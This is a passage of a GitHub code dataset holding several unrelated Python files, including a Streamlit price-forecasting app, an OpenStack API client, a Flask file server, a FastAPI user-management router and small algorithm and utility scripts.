import mean_absolute_error, mean_squared_error \nfrom math import sqrt\nfrom statsmodels.tsa.seasonal import seasonal_decompose\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\n# Define the dataframes\nforex_data = {\n 'Forex Pair': ['EUR/USD', 'GBP/USD', 'USD/JPY', 'AUD/USD', 'USD/CHF', 'USD/CAD', 'NZD/USD'],\n 'Yahoo Finance Ticker': ['EURUSD=X', 'GBPUSD=X', 'USDJPY=X', 'AUDUSD=X', 'USDCHF=X', 'USDCAD=X', 'NZDUSD=X']\n}\n\ncrypto_data = {\n 'Cryptocurrency': ['Bitcoin', 'Ethereum', 'Ripple', 'Litecoin'],\n 'Yahoo Finance Ticker': ['BTC-USD', 'ETH-USD', 'XRP-USD', 'LTC-USD']\n}\n\ncommodity_data = {\n 'Commodity': ['Gold', 'Crude Oil (WTI)', 'Silver', 'Natural Gas'],\n 'Yahoo Finance Ticker': ['GC=F', 'CL=F', 'SI=F', 'NG=F']\n}\n\nindices_data = {\n 'Index': ['S&P 500', 'Dow Jones Industrial Average', 'Nasdaq Composite', 'FTSE 100'],\n 'Yahoo Finance Ticker': ['^GSPC', '^DJI', '^IXIC', '^FTSE']\n}\n\n# Step 1: Set up Streamlit app and user input\n\n# Set page configuration\nst.set_page_config(\n page_title=\"Price Prediction App\",\n page_icon=\"✅\",\n layout=\"wide\",\n)\n\nst.subheader(\"Example inputs\")\n\n# Sidebar section\nst.sidebar.title(\"Settings\")\n\n# Create a select box in the sidebar to choose a dataframe\nselected_dataframe = st.sidebar.selectbox(\"Select a Dataframe\", [\"Forex\", \"Cryptocurrency\", \"Commodities\", \"Indices\"])\n\n# Create a select box for choosing the timeframe interval\nselected_interval = st.sidebar.selectbox(\"Select Timeframe Interval\", [\"1d\", \"1wk\", \"1mo\"])\n\n# Create a select box for choosing the ticker symbol\nsymbol = st.sidebar.text_input('Enter a ticker symbol:', 'BTC-USD')\n\n\n# Display the selected dataframe in the main content area\nif selected_dataframe == \"Forex\":\n st.write(pd.DataFrame(forex_data))\nelif selected_dataframe == \"Cryptocurrency\":\n st.write(pd.DataFrame(crypto_data))\nelif selected_dataframe == \"Commodities\":\n st.write(pd.DataFrame(commodity_data))\nelif selected_dataframe == \"Indices\":\n st.write(pd.DataFrame(indices_data))\n\n\n\n\n# Step 2: Fetch and prepare the data with the selected timeframe interval\ndf = yf.download(symbol, period=\"5y\", interval=selected_interval)\ndf = df[[\"Close\"]]\ndf = df.reset_index()\ndf.columns = [\"ds\", \"y\"]\ndf = df.sort_values(by=[\"ds\"], ascending=True)\n\n# Set the frequency of the DateTimeIndex\ndf[\"ds\"] = pd.to_datetime(df[\"ds\"])\ndf = df.set_index(pd.DatetimeIndex(df[\"ds\"]))\n\n# Step 3: Fit the Prophet model\nmodel = Prophet()\nmodel.fit(df)\n\n# Step 4: Make predictions\nfuture_trends = model.make_future_dataframe(periods=1000, freq=\"H\")\nforecast_trends = model.predict(future_trends)\n\n# Step 5: Visualize the predictions\nst.write(f'Price data for {symbol}')\nst.line_chart(df.set_index('ds')['y'])\n\nst.write(f'Predicted price data for {symbol}')\nfig1 = model.plot(forecast_trends)\nst.pyplot(fig1)\n\nst.write(f'Forecast components for {symbol}')\nfig2 = model.plot_components(forecast_trends)\nst.pyplot(fig2)\n\nforecast_trends = forecast_trends.set_index([\"ds\"])\n\n# Step 6: Additional analysis\n\n# 1. Performance Metrics\ny_true = df['y']\ny_pred = forecast_trends.loc[df['ds'], 'yhat']\n\nmae = mean_absolute_error(y_true, y_pred)\nmse = mean_squared_error(y_true, y_pred)\nrmse = sqrt(mse)\n\nst.write('Mean Absolute Error (MAE):', mae)\nst.write('Mean Squared Error (MSE):', mse)\nst.write('Root Mean Squared Error (RMSE):', rmse)\n\n# 2. Volatility Analysis\ndf['returns'] = df['y'].pct_change()\ndf['volatility'] = df['returns'].rolling(window=20).std()\n\nst.write('Volatility of {}'.format(symbol))\nst.line_chart(df['volatility'])\n\n# 3. Moving Averages\ndf['sma_50'] = df['y'].rolling(window=50).mean()\ndf['sma_200'] = df['y'].rolling(window=200).mean()\n\nst.write('Moving Averages for {}'.format(symbol))\nst.line_chart(df[['y', 'sma_50', 'sma_200']])\n\n# 4. Seasonal Decomposition\nresult = seasonal_decompose(df['y'], model='multiplicative', period=365)\nfig, (ax1, ax2, ax3, ax4) = plt.subplots(4, 1, figsize=(15, 10))\n\nresult.observed.plot(ax=ax1)\nax1.set_ylabel('Observed')\nresult.trend.plot(ax=ax2)\nax2.set_ylabel('Trend')\nresult.seasonal.plot(ax=ax3)\nax3.set_ylabel('Seasonal')\nresult.resid.plot(ax=ax4)\nax4.set_ylabel('Residual')\n\nst.write(f'Seasonal Decomposition for {symbol}')\nst.pyplot(fig)","repo_name":"RichieGarafola/AssetPricePrediction","sub_path":"forecaster.py","file_name":"forecaster.py","file_ext":"py","file_size_in_byte":4423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"1749252543","text":"import logging\nlog = logging.getLogger('zen.OpenStack.txapiclient')\n\nfrom .session import SessionManager\nfrom .exceptions import APIClientError\n\nfrom twisted.internet.defer import inlineCallbacks, returnValue\n\nimport json\n\n\nclass BaseClient(object):\n session_manager = None\n keystone_service_type = None # override in subclasses\n\n def __init__(self, username=None, password=None, auth_url=None, project_id=None, region_name=None, session_manager=None):\n if session_manager:\n self.session_manager = session_manager\n else:\n self.session_manager = SessionManager(username, password, auth_url, project_id, region_name)\n\n @inlineCallbacks\n def get_url(self, interface=\"public\"):\n base_url = yield self.session_manager.get_service_url(self.keystone_service_type, interface)\n returnValue(base_url)\n\n @inlineCallbacks\n def get_json(self, url_path, interface=\"public\", **kwargs):\n base_url = yield self.session_manager.get_service_url(self.keystone_service_type, interface)\n full_url = base_url + url_path\n\n body, headers = yield self.session_manager.authenticated_GET_request(full_url, params=kwargs)\n # will raise an exception if there was an error, so we can assume\n # that the result is normal json.\n\n try:\n data = json.loads(body)\n except ValueError:\n raise APIClientError(\"Unable to parse JSON response from %s: %s\" % (full_url, body))\n\n returnValue(data)\n\n @inlineCallbacks\n def get_json_collection(self, url_path, interface=\"public\", **kwargs):\n \"\"\"\n Collections are represented as one or more pages, linked by next/previous\n urls. We just spin through all the nexts, building up the result, and\n then return the whole thing.\n \"\"\"\n\n base_url = yield self.session_manager.get_service_url(self.keystone_service_type, interface)\n full_url = base_url + url_path\n\n result = {}\n while True:\n body, headers = yield self.session_manager.authenticated_GET_request(full_url, params=kwargs)\n # will raise an exception if there was an error, so we can assume\n # that the result is normal json.\n\n try:\n data = json.loads(body)\n except ValueError:\n raise APIClientError(\"Unable to parse JSON response from %s: %s\" % (full_url, body))\n\n for key in data.keys():\n if key != 'links':\n if key not in 'result':\n result[key] = []\n result[key].extend(data[key])\n\n full_url = data['links']['next']\n if full_url is None:\n break\n\n returnValue(result)\n\n\ndef api(url_path):\n\n @inlineCallbacks\n def api_caller(self, **kwargs):\n result = yield self.get_json(url_path, **kwargs)\n returnValue(result)\n\n return api_caller\n\n\ndef api_collection(url_path, **kwargs):\n\n @inlineCallbacks\n def api_caller(self):\n result = yield self.get_json_collection(url_path, **kwargs)\n returnValue(result)\n\n return api_caller\n","repo_name":"zenoss/ZenPacks.zenoss.OpenStack","sub_path":"ZenPacks/zenoss/OpenStack/apiclients/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":3157,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"76"} +{"seq_id":"30216761267","text":"# -*- coding: utf-8 -*-\n\n__all__ = ['AptRepository']\n__version__ = '0.1'\n__docformat__ = 'restructuredtext'\n\n\nfrom os import path as os_path\nfrom os import makedirs, listdir\nfrom flask import Flask, abort, jsonify, send_from_directory\n\nfrom multiprocessing import Process\n\n\nclass AptRepository(Flask):\n\n def __init__(self, root_dir, **kwargs):\n super(AptRepository, self).__init__(__name__, **kwargs)\n self.root_dir = root_dir\n self.add_route(\"/\")\n self.server= None\n\n def add_route(self, rule):\n self.add_url_rule(rule, view_func=self.list_files)\n\n def list_files(self, path):\n files = []\n realpath = os_path.join(self.root_dir, path)\n if os_path.exists(realpath):\n if os_path.isfile(realpath):\n return send_from_directory(self.root_dir, path, as_attachment=True)\n if os_path.isdir(realpath):\n for filename in listdir(realpath):\n files.append(filename)\n else:\n abort(404)\n return jsonify(files)\n\n def start_repository(self, **arguments):\n self.server = Process(target=self.run, kwargs=arguments)\n self.server.start()\n\n def stop_repository(self):\n self.server.terminate()\n self.server.join()\n","repo_name":"denysom/APTF","sub_path":"core/aptf/lib/AptRepository.py","file_name":"AptRepository.py","file_ext":"py","file_size_in_byte":1298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"24811830280","text":"import argparse\nimport random\nimport os\nimport tqdm\nimport shutil\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"DATA_DIR\", type=str, help=\"The directory of the dataset\")\nparser.add_argument(\"TARGET_DIR\", type=str, help=\"The target directory of the split\")\nparser.add_argument(\"--train_size\", default=0.7, type=float)\nparser.add_argument(\"--validation_size\", default=0.15, type=float)\n\nargs = parser.parse_args()\n\nif not 0 < args.train_size <= 1:\n raise argparse.ArgumentError(\"Train size must be a ratio [0-1]\")\n\n\ndef make_or_clear_dir(dir):\n if not os.path.exists(dir):\n os.mkdir(dir)\n else:\n for file in os.listdir(dir):\n filepath = os.path.join(dir, file)\n try:\n if os.path.isfile(dir):\n os.unlink(filepath)\n except Exception as e:\n print(e)\n\n\ndef copy_files(filenames, src_dir, dst_dir):\n for filename in tqdm.tqdm(filenames):\n orig_path = os.path.join(src_dir, filename)\n new_path = os.path.join(dst_dir, filename)\n shutil.copyfile(orig_path, new_path)\n\n\ndef extract_and_copy(files, name, split_num, src_dir, target_dir):\n dir_name = os.path.join(target_dir, name)\n make_or_clear_dir(dir_name)\n\n print(f\"Creating {split_num} {name} files in {dir_name}\")\n split_files = set(random.sample(files, k=split_num))\n copy_files(split_files, src_dir, dir_name)\n return files - split_files\n\n\nassert (\n 0 < args.train_size + args.validation_size <= 1\n), \"Invalid: 0 < train_ratio + validation_ratio <= 1 not satisfied\"\n\ndata_dir = args.DATA_DIR\ntarget_dir = args.TARGET_DIR\n\nfiles = set(\n [image_name for image_name in os.listdir(data_dir) if image_name.endswith(\"png\")]\n)\ntrain_num = int(len(files) * args.train_size)\nif args.train_size + args.validation_size == 1:\n validation_num = len(files) - train_num\nelse:\n validation_num = int(len(files) * args.validation_size)\n test_num = len(files) - train_num - validation_num\n\nremaining_files = extract_and_copy(files, \"train\", train_num, data_dir, target_dir)\nremaining_files = extract_and_copy(\n remaining_files, \"validation\", validation_num, data_dir, target_dir\n)\n\nif test_num > 0:\n extract_and_copy(remaining_files, \"test\", test_num, data_dir, target_dir)\n","repo_name":"mattdeak/street-signs","sub_path":"split_data.py","file_name":"split_data.py","file_ext":"py","file_size_in_byte":2281,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"72061662967","text":"class Solution:\n def longest(self,nums):\n if len(nums)==0:\n return 0\n maxlen=1\n dp=[1]*len(nums)\n for i in range(len(nums)):\n templen=0\n for j in range(i):\n if nums[i]>nums[j]:\n templen=max(templen,dp[j])\n dp[i]=templen+1\n maxlen=max(maxlen,dp[i])\n return maxlen\n\n\nclass Solution2(object):\n def lengthOfLIS(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n if not nums:\n return 0\n maxlen = 1\n dp = [1] * len(nums)\n for i in range(1, len(nums)):\n for j in range(i):\n if nums[i] > nums[j] and dp[j] + 1 > dp[i]:\n dp[i] = dp[j] + 1\n maxlen = max(maxlen, dp[i])\n return maxlen\n","repo_name":"yinccc/leetcodeEveryDay","sub_path":"300-20190424-Longest increasting substring.py","file_name":"300-20190424-Longest increasting substring.py","file_ext":"py","file_size_in_byte":843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"17924738955","text":"import sys\r\nimport os\r\nfrom src import src, to_json\r\nfrom cmp import cmp\r\n\r\nhelp = f\"\"\"\\\r\nCompare two or more sorce projects.\r\n Use:\r\n {(os.path.split(sys.argv[0])[1])} [ [ ...]]\r\n\"\"\"\r\n\r\nif __name__ == \"__main__\":\r\n if len(sys.argv) < 4:\r\n print(help)\r\n exit(1)\r\n cfg = sys.argv[1]\r\n if not os.path.isfile(cfg):\r\n print(f\"Not found file \\\"{cfg}\\\"!\")\r\n exit(1)\r\n pjs = sys.argv[2:]\r\n for pj in pjs:\r\n if not os.path.isdir(pj):\r\n print(f\"Not found directory \\\"{pj}\\\"!\")\r\n exit(1)\r\n # srcs = [{\"source_location_root\":pj} for pj,i in zip(pjs,range(len(pjs)))]\r\n srcs = [src(cfg, pj, \"%s.src\" % (i+1)) for pj,i in zip(pjs,range(len(pjs)))]\r\n for i in range(len(srcs)):\r\n for j in range(i+1,len(srcs)):\r\n out_name = \"%s-%s.cmp\" % (i+1,j+1)\r\n print( out_name )\r\n to_json(cmp(srcs[i], srcs[j]), out_name)\r\n\r\n # print(srcs[i][\"source_location_root\"])\r\n\r\n\r\n","repo_name":"editorbank/srccmp","sub_path":"srccmp.py","file_name":"srccmp.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"35493841728","text":"#!/usr/bin/python3\n'''\n\nCreates a POST request with urllib\n\n'''\n\n\nimport urllib.request\nimport urllib.parse\nimport sys\n\n\nif __name__ == \"__main__\":\n argv = sys.argv\n url = argv[1]\n email = argv[2]\n params = {\"email\": email}\n data = urllib.parse.urlencode(params)\n data = data.encode('ascii')\n request = urllib.request.Request(url, data)\n with urllib.request.urlopen(request) as response:\n print(response.read().decode('utf-8'))\n","repo_name":"valentino7504/alx-higher_level_programming","sub_path":"0x11-python-network_1/2-post_email.py","file_name":"2-post_email.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"8141940558","text":"import math\n\n\nclass Evaluator:\n\n def __init__(self, test):\n self.test = test\n self.test_rows = len(test)\n self.test_cols = len(test[0])\n self.TP = 0\n self.FP = 0\n self.FN = 0\n\n def __rmse(self, prediction_mat):\n count = 0\n sum_res = 0.0\n for i in range(self.test_rows):\n for j in range(self.test_cols):\n if self.test[i][j] > 0:\n sum_res += (prediction_mat[i][j] - self.test[i][j]) ** 2\n count += 1\n\n return math.sqrt(sum_res / count)\n\n def __mae(self, prediction_mat):\n count = 0\n sum_res = 0.0\n for i in range(self.test_rows):\n for j in range(self.test_cols):\n if self.test[i][j] > 0:\n sum_res += abs(prediction_mat[i][j] - self.test[i][j])\n count += 1\n\n return sum_res / count\n\n def __pre_calc(self, recomm_items):\n self.TP = 0\n self.FP = 0\n self.FN = 0\n\n for i in range(self.test_rows):\n for j in range(len(recomm_items[i])):\n if recomm_items[i][j] < self.test_cols and \\\n self.test[i][recomm_items[i][j]] > 0:\n self.TP += 1\n else:\n self.FP += 1\n\n for i in range(self.test_rows):\n for j in range(self.test_cols):\n if self.test[i][j] > 0 and j not in recomm_items[i]:\n self.FN += 1\n\n def __prec(self):\n return float(self.TP) / float(self.TP + self.FP)\n\n def __recall(self):\n return float(self.TP) / float(self.TP + self.FN)\n\n def __f1(self, prec, recall):\n if prec + recall == 0:\n f1 = 0\n else:\n f1 = 2 * prec * recall / (prec + recall)\n\n return f1\n\n def eval(self, recomm_items, prediction_mat, ret_obj=True):\n \"\"\"\n Calculates precision, recall, f1 score, RMSE and MAE.\n :param recomm_items: 2D array with recommended items (ids) for users\n :param prediction_mat: Matrix with all ratings predictions\n :param ret_obj: return object if True, if not return list\n [\n user0 -> [item_id0, item_id1, ...]\n ...\n ]\n :return:\n \"\"\"\n self.__pre_calc(recomm_items)\n prec = self.__prec()\n recall = self.__recall()\n f1 = self.__f1(prec, recall)\n rmse = self.__rmse(prediction_mat)\n mae = self.__mae(prediction_mat)\n\n if ret_obj:\n return {\n \"prec\": prec,\n \"recall\": recall,\n \"f1\": f1,\n \"rmse\": rmse,\n \"mae\": mae\n }\n else:\n return [prec, recall, f1, rmse, mae]\n","repo_name":"SkySurferOne/Recommender-System","sub_path":"src/main/Evaluator.py","file_name":"Evaluator.py","file_ext":"py","file_size_in_byte":2780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"29784532071","text":"from BTree import BTree,BTNode\ndef Level(bt,x): \t #解法1\n return _Level(bt.b,x,1)\ndef _Level(t,x,h):\n if t==None:\n return 0\t\t\t\t\t\t\t\t#空树不能找到该结点\n elif t.data==x:\n return h\t\t\t\t\t\t\t\t#根结点即为所找,返回其层次\n else:\n l=_Level(t.lchild,x,h+1)\t\t\t #在左子树中查找\n if l!=0:\n return l\t\t\t\t\t\t#左子树中找到了,返回其层次\n else:\n return _Level(t.rchild,x,h+1)\t #左子树中未找到,再在右子树中查找\n\n'''\ndef Level2(bt,x): \t#解法2\n return _Level2(bt.b,x)\ndef _Level2(t,x):\n if t==None:\t\t\t\t\t\t\t\t\t#空树不能找到该结点\n return 0\n if t.data==x:\t\t\t\t\t\t\t\t#根结点值为x\n return 1\n leftl=0 if t.lchild==None else _Level2(t.lchild,x)\n rightl=0 if t.rchild==None else _Level2(t.rchild,x)\n if leftl<1 and rightl<1:\t\t\t\t\t\t#左右子树都没有找到,返回0\n return 0;\n return max(leftl,rightl)+1\t\t\t\t#返回左右子树中最大层次+1\n'''\n\n#主程序\nb=BTNode('A')\np1=BTNode('B')\np2=BTNode('C')\np3=BTNode('D')\np4=BTNode('E')\np5=BTNode('F')\np6=BTNode('G')\nb.lchild=p1\nb.rchild=p2\np1.lchild=p3\np3.rchild=p6\np2.lchild=p4\np2.rchild=p5\nbt=BTree()\nbt.SetRoot(b)\nprint(\"bt:\",end=' ');print(bt.DispBTree())\nx='C'\nprint(x+\"的层次=%d\" %(Level(bt,x)))\nx='F'\nprint(x+\"的层次=%d\" %(Level(bt,x)))\nx='X'\nprint(x+\"的层次=%d\" %(Level(bt,x)))\n\n","repo_name":"renyumeng1/sound-code","sub_path":"ch6/Exam6-12.py","file_name":"Exam6-12.py","file_ext":"py","file_size_in_byte":1453,"program_lang":"python","lang":"zh","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"3241422375","text":"import crud\nimport openpyxl\nfrom fastapi import APIRouter, Depends, HTTPException, UploadFile, File, Request, Header\nfrom fastapi.security.api_key import APIKey\nfrom fastapi.responses import FileResponse\nfrom os import getcwd\nfrom schemas.users_schema import User, row_to_schema\nfrom schemas.other_schemas import UserIdentification, IdList, UserUpdate\nfrom db.db import get_db\nfrom sqlalchemy.orm import Session\nfrom core import utils\nfrom core import responses\nfrom core.config import settings\nfrom core.messages import messages\nfrom core import auth\nfrom typing import List, Optional, Union\nfrom db.enums import UserStatusEnum, RoleEnum\nfrom api import requests\n\n\n# crear router\n\nusers_router = APIRouter()\nauth_key = 'Authorization' \n\n# ------------------------------ POST ------------------------------------------------\n@users_router.post('/login', tags=['users'])\ndef login():\n \"\"\"\n Inicia sesión y obtiene el token del servicio de autenticación\n \"\"\"\n response = requests.login()\n return response\n\n\n@users_router.post('/get_project_info_by_student', tags=['users'])\ndef get_project_info_by_student(identification: UserIdentification, db: Session = Depends(get_db), \n api_key: APIKey = Depends(auth.get_api_key)):\n \"\"\"\n Obtiene información del proyecto donde está inscrito un estudiante\n \"\"\"\n project_info = crud.users.get_project_info_by_student(identification.identification, db)\n if project_info['name'] is None:\n project_info['task_list'] = []\n else:\n project_info['task_list'] = crud.tasks.get_tasks_by_student(identification.identification, db)\n db.close()\n return project_info\n \n\n@users_router.post('/get_user', tags=['users'])\ndef get_user(identification: UserIdentification, db: Session = Depends(get_db)):\n \"\"\"\n Obtiene los datos de un usuario a partir de la cédula\n \"\"\"\n user = crud.users.get_user_info_by_identification(identification.identification, db)\n db.close()\n return user\n\n@users_router.post('/enroll_students_in_project/{project_id}', tags=['users'])\ndef enroll_students_in_project(id_students: List[int], project_id: int, db: Session = Depends(get_db), \n api_key: APIKey = Depends(auth.get_api_key)):\n \"\"\"\n Inscribe a los estudiantes seleccionados en un proyecto a partir de una lista de ids\n \"\"\"\n user = crud.users.enroll_students_in_project(id_students, project_id, db)\n db.close()\n return user\n\n\n@users_router.post('/create_student', tags=['users'])\ndef create_student(user: User, request: Request, db: Session = Depends(get_db), api_key: APIKey = Depends(auth.get_api_key)):\n \"\"\"\n Crear un estudiante\n \"\"\"\n authorization = request.headers.get(auth_key)\n response = crud.users.create_user_with_username(user, RoleEnum.Student, db, authorization)\n db.close()\n return response\n\n\n\n@users_router.post('/create_students', tags=['users'])\ndef create_students(users: List[User], request: Request, db: Session = Depends(get_db), api_key: APIKey = Depends(auth.get_api_key)):\n \"\"\"\n Crear estudiantes a partir de una lista\n \"\"\"\n authorization = request.headers.get(auth_key)\n response = crud.users.create_users_with_username(users, RoleEnum.Student, db, authorization)\n db.close()\n return response\n\n\n@users_router.post('/create_tutor', tags=['users'])\ndef create_tutor(user: User, request: Request, db: Session = Depends(get_db), api_key: APIKey = Depends(auth.get_api_key)):\n \"\"\"\n Crear un tutor\n \"\"\"\n authorization = request.headers.get(auth_key)\n response = crud.users.create_user_with_username(user, RoleEnum.Tutor, db, authorization)\n db.close()\n return response\n\n\n\n@users_router.post('/create_tutors', tags=['users'])\ndef create_tutors(users: List[User], request: Request, db: Session = Depends(get_db), api_key: APIKey = Depends(auth.get_api_key)):\n \"\"\"\n Crear tutores a partir de una lista\n \"\"\"\n authorization = request.headers.get(auth_key)\n response = crud.users.create_users_with_username(users, RoleEnum.Tutor, db, authorization)\n db.close()\n return response\n\n@users_router.post('/create_students_from_file', tags=['users'])\nasync def upload_file(file: UploadFile=File(...), db: Session = Depends(get_db)\n , api_key: APIKey = Depends(auth.get_api_key)):\n \"\"\"\n Crea estudiantes a partir de un archivo\n \"\"\"\n # with open(getcwd() + file.filename, 'wb') as myfile:\n if not utils.is_valid_file(file.filename):\n raise HTTPException(400, detail=messages['invalid_document_type']) \n\n # save file\n upload_path = utils.get_upload_path(file.filename)\n with open(upload_path, 'wb') as myfile:\n content = await file.read()\n myfile.write(content)\n myfile.close()\n\n schema_list = utils.get_schema_list_from_file(upload_path, row_to_schema, settings.USERS_FILE_FORMAT)\n response = crud.users.create_users_from_list(schema_list, 'Estudiante', db)\n db.close()\n return response\n\n\n\n@users_router.post('/create_tutors_from_file', tags=['users'])\nasync def upload_file(file: UploadFile=File(...), db: Session = Depends(get_db)\n , api_key: APIKey = Depends(auth.get_api_key)):\n \"\"\"\n Crea estudiantes a partir de un archivo\n \"\"\"\n # with open(getcwd() + file.filename, 'wb') as myfile:\n if not utils.is_valid_file(file.filename):\n raise HTTPException(400, detail=messages['invalid_document_type']) \n\n # save file\n upload_path = utils.get_upload_path(file.filename)\n with open(upload_path, 'wb') as myfile:\n content = await file.read()\n myfile.write(content)\n myfile.close()\n\n schema_list = utils.get_schema_list_from_file(upload_path, row_to_schema, settings.USERS_FILE_FORMAT)\n response = crud.users.create_users_from_list(schema_list, 'Tutor', db)\n db.close()\n return response\n\n\n# ------------------------------ UPDATE ------------------------------------------------\n\n@users_router.put('/update_user', tags=['users'])\ndef update_user(user: UserUpdate, db: Session = Depends(get_db), \n api_key: APIKey = Depends(auth.get_api_key), authorization: str = Header(default=None)):\n \"\"\"\n Actualiza los datos de un usuario \n \"\"\"\n users = crud.users.update_user(user, authorization, db)\n db.close()\n return responses.USER_UPDATED_SUCCESS\n\n\n@users_router.put('/delete_student_project', tags=['users'])\ndef delete_student_project(identification: UserIdentification, db: Session = Depends(get_db), \n api_key: APIKey = Depends(auth.get_api_key)):\n \"\"\"\n Saca al estudiante del proyecto actual\n \"\"\"\n response = crud.users.delete_student_project(identification.identification, db)\n db.close()\n return responses.USER_UPDATED_SUCCESS\n\n\n@users_router.put('/delete_students_project', tags=['users'])\ndef delete_students_project(id_list: IdList, db: Session = Depends(get_db), \n api_key: APIKey = Depends(auth.get_api_key)):\n \"\"\"\n Saca al estudiante del proyecto actual\n \"\"\"\n response = crud.users.delete_students_project(id_list.id_list, db)\n db.close()\n return response\n\n\n@users_router.put('/update_student_status/{status}', tags=['users'])\ndef update_student_status(identification: UserIdentification, status: UserStatusEnum, db: Session = Depends(get_db), \n api_key: APIKey = Depends(auth.get_api_key)):\n \"\"\"\n Actualiza el estatus de un estudiante\n \"\"\"\n users = crud.users.update_student_status(identification.identification, status, db)\n db.close()\n return responses.USER_UPDATED_SUCCESS\n\n\n@users_router.put('/update_students_status/{status}', tags=['users'])\ndef update_students_status(id_list: IdList, status: UserStatusEnum, db: Session = Depends(get_db),\n api_key: APIKey = Depends(auth.get_api_key)):\n \"\"\"\n \n \"\"\"\n response = crud.users.update_students_status(id_list.id_list, status, db)\n db.close()\n return response\n\n# ------------------------------ GET ------------------------------------------------\n\n@users_router.get('/get_students')\n@users_router.get('/get_students/{status}', tags=['users'])\ndef get_students(status: Optional[str] = None, db: Session = Depends(get_db)):\n \"\"\"\n Obtener una lista de estudiantes con los siguientes campos\n Cédula, nombre, apellido, horas, proyecto, fecha de aprobación\n \"\"\"\n if status == None:\n users = crud.users.get_students(db)\n elif status == 'No-asignado': \n users = crud.users.get_students_without_project(db)\n elif status == 'Asignado':\n users = crud.users.get_students_with_project(db)\n elif status == 'Aprobado':\n users = crud.users.get_approved_students(db)\n elif status == 'Activo' or status == 'Inactivo' or status == 'Graduado':\n users = crud.users.get_students_by_status(db, status)\n else:\n raise HTTPException(status_code=400, detail=messages['incorrect_status'])\n db.close()\n return users\n\n\n\n\n@users_router.get('/get_students_without_project', tags=['users'])\ndef get_students_without_project(db: Session = Depends(get_db)):\n \"\"\"\n Obtener una lista de estudiantes que están activos pero\n no tienen proyecto asignado\n \"\"\"\n users = crud.users.get_students_without_project(db)\n db.close()\n return users\n\n\n\n\n\n@users_router.get('/get_tutors', tags=['users'])\ndef get_tutors(db: Session = Depends(get_db)):\n \"\"\"\n Obtiene la lista de tutores\n \"\"\"\n users = crud.users.get_tutors(db)\n db.close()\n return users\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"angelavts/Servicio-comunitario-API","sub_path":"api/users_router.py","file_name":"users_router.py","file_ext":"py","file_size_in_byte":9544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"42484958046","text":"from django.contrib.auth.decorators import login_required\r\nfrom django.http import HttpResponseRedirect, HttpResponse\r\nfrom django.shortcuts import render, get_object_or_404\r\n# Create your views here.\r\nfrom django.template import loader\r\nfrom django.urls import reverse\r\nfrom massage.forms import newpost\r\nfrom massage.models import Post, viewer\r\n\r\n\r\n############################################\r\n\r\n@login_required\r\ndef Post_view(request, post_id):\r\n post = get_object_or_404(Post, pk=post_id)\r\n prof = request.user.profile\r\n try:\r\n view = viewer.objects.get(prof=prof, post=post)\r\n except:\r\n view = None\r\n if view is None and prof != post.prof:\r\n view = viewer.objects.create(post=post, prof=prof)\r\n post.views += 1\r\n pass\r\n if request.method == 'POST':\r\n comment = request.POST.get('comment')\r\n like = request.POST.get('like')\r\n if view is not None:\r\n view.comment = comment\r\n view.save()\r\n if like is True:\r\n post.like += 1\r\n post.save()\r\n context = {\r\n 'post': post\r\n }\r\n return HttpResponseRedirect(reverse(viewname='massage:post_list'))\r\n else:\r\n if view != None:\r\n view.save()\r\n post.save()\r\n context = {\r\n 'post': post\r\n }\r\n return render(request, 'massage/posts_view.html', context)\r\n\r\n############################################\r\n\r\n\r\ndef Post_list(request):\r\n posts = Post.objects.all().order_by('share_date')\r\n context = {\r\n 'posts': posts,\r\n }\r\n return render(request, 'massage/posts_list.html', context)\r\n\r\n############################################\r\n\r\n\r\ndef Post_data(request, post_id):\r\n post = get_object_or_404(Post, pk=post_id)\r\n data = post.data\r\n context = {\r\n 'data': data,\r\n 'post': post\r\n }\r\n return render(request, 'massage/post_data.html', context)\r\n\r\n############################################\r\n\r\n\r\n@login_required\r\ndef New_post(request):\r\n if request.method == 'POST':\r\n post = newpost(request.POST, request.FILES)\r\n if post.is_valid():\r\n new_post = post.save(commit=False)\r\n new_post.prof = request.user.profile\r\n new_post.save()\r\n return HttpResponseRedirect(reverse('massage:Post_view', kwargs={'post_id': new_post.pk}))\r\n\r\n context = {\r\n 'post': post\r\n }\r\n else:\r\n post = newpost()\r\n context = {\r\n 'post': post\r\n }\r\n return render(request, 'massage/newpost.html', context)\r\n\r\n############################################\r\n\r\n\r\ndef Mypost(request):\r\n post = Post.objects.filter(prof=request.user.profile)\r\n context = {\r\n \"post\": post\r\n }\r\n return render(request, \"massage/mypost.html\", context)\r\n############################################\r\n","repo_name":"hamedpython2020/MyMassagerss","sub_path":"massage/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"2020347983","text":"class intersection():\n\tdef __init__(self,startNum):\n\t\tself.startNum=startNum\n\t\tself.roadList={}\n\t\tself.waitingList=[]\n\tdef addRoad(self,roadName,nextInter,length):\n\t\tself.roadList[roadName]={\"nextInter\":nextInter,\"length\":length}\n\tdef getRoadInfo(self, roadName):\n\t\ttry:\n\t\t\treturn self.roadList[roadName]\n\t\texcept:\n\t\t\treturn None\n\tdef addWaitingList(self, carObj):\n\t\tself.waitingList.append(carObj)\n\n\nclass car():\n\tdef 